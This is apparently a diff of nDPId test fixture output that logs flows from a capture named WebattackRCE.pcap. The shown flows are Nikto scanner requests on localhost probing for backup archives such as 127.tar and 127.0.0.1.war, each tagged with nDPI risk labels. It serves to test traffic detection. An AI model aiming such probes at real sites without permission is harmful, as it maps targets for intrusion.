(Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":180,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276950,"flow_last_seen":1576420276950,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276950,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49904,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":180,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":180,"flow_packet_id":1,"flow_last_seen":1576420276950,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276950,"pkt":"AAAAAAAAAAAAAAAACABFAADGIHlAAEAGG7d\/AAABfwAAAcLwH5AJERgjseiOe4AYAED+ugAAAQEICp1m+\/6dZvv+R0VUIC8xMjcwMC50YXIubHptYSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":180,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276950,"flow_last_seen":1576420276950,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276950,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49904,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":180,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276950,"flow_last_seen":1576420276950,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276950,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49904,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":181,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276953,"flow_last_seen":1576420276953,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276953,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49906,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":181,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":181,"flow_packet_id":1,"flow_last_seen":1576420276953,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276953,"pkt":"AAAAAAAAAAAAAAAACABFAADB609AAEAGUOV\/AAABfwAAAcLyH5CMSNMc4cqoooAYAED+tQAAAQEICp1m\/AGdZvwBR0VUIC8xMjcwMC50Z3ogSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":181,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276953,"flow_last_seen":1576420276953,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276953,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49906,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":181,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276953,"flow_last_seen":1576420276953,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276953,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49906,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":182,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276955,"flow_last_seen":1576420276955,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276955,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49908,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":182,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":182,"flow_packet_id":1,"flow_last_seen":1576420276955,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276955,"pkt":"AAAAAAAAAAAAAAAACABFAADBW5ZAAEAG4J5\/AAABfwAAAcL0H5DrXWPDXa4XUYAYAED+tQAAAQEICp1m\/AOdZvwDR0VUIC8xMjcwMC50Z3ogSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":182,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276955,"flow_last_seen":1576420276955,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276955,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49908,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":182,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276955,"flow_last_seen":1576420276955,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276955,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49908,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":183,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276956,"flow_last_seen":1576420276956,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276956,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49910,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":183,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":183,"flow_packet_id":1,"flow_last_seen":1576420276956,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420276956,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/O0xAAEAGAOt\/AAABfwAAAcL2H5D9kwMeqK3jJ4AYAED+swAAAQEICp1m\/ASdZvwER0VUIC8xMjcudGFyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":183,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276956,"flow_last_seen":1576420276956,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276956,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49910,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":183,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276956,"flow_last_seen":1576420276956,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276956,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49910,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":184,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276957,"flow_last_seen":1576420276957,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276957,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49912,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":184,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":184,"flow_packet_id":1,"flow_last_seen":1576420276957,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420276957,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/H8ZAAEAGHHF\/AAABfwAAAcL4H5BlEieUASYiL4AYAED+swAAAQEICp1m\/AWdZvwFR0VUIC8xMjcudGFyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":184,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276957,"flow_last_seen":1576420276957,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276957,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49912,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":184,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276957,"flow_last_seen":1576420276957,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276957,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49912,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":185,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276959,"flow_last_seen":1576420276959,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276959,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49914,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":185,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":185,"flow_packet_id":1,"flow_last_seen":1576420276959,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420276959,"pkt":"AAAAAAAAAAAAAAAACABFAADIMS5AAEAGCwB\/AAABfwAAAcL6H5D33Al8T9gIjoAYAED+vAAAAQEICp1m\/AedZvwHR0VUIC8xMjdfMF8wXzEudGFyLmd6IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":185,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276959,"flow_last_seen":1576420276959,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276959,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49914,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":185,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276959,"flow_last_seen":1576420276959,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276959,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49914,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":186,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276960,"flow_last_seen":1576420276960,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276960,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49916,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":186,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":186,"flow_packet_id":1,"flow_last_seen":1576420276960,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420276960,"pkt":"AAAAAAAAAAAAAAAACABFAADI29RAAEAGYFl\/AAABfwAAAcL8H5B21OOLlrDXQ4AYAED+vAAAAQEICp1m\/AidZvwIR0VUIC8xMjdfMF8wXzEudGFyLmd6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":186,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276960,"flow_last_seen":1576420276960,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276960,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49916,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":186,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276960,"flow_last_seen":1576420276960,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276960,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49916,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":187,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276961,"flow_last_seen":1576420276961,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276961,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49918,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":187,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":187,"flow_packet_id":1,"flow_last_seen":1576420276961,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276961,"pkt":"AAAAAAAAAAAAAAAACABFAADFGIxAAEAGI6V\/AAABfwAAAcL+H5DvJyDTt9IC\/IAYAED+uQAAAQEICp1m\/AmdZvwJR0VUIC8xMjcuMC4wLjEud2FyIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":187,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276961,"flow_last_seen":1576420276961,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276961,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49918,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 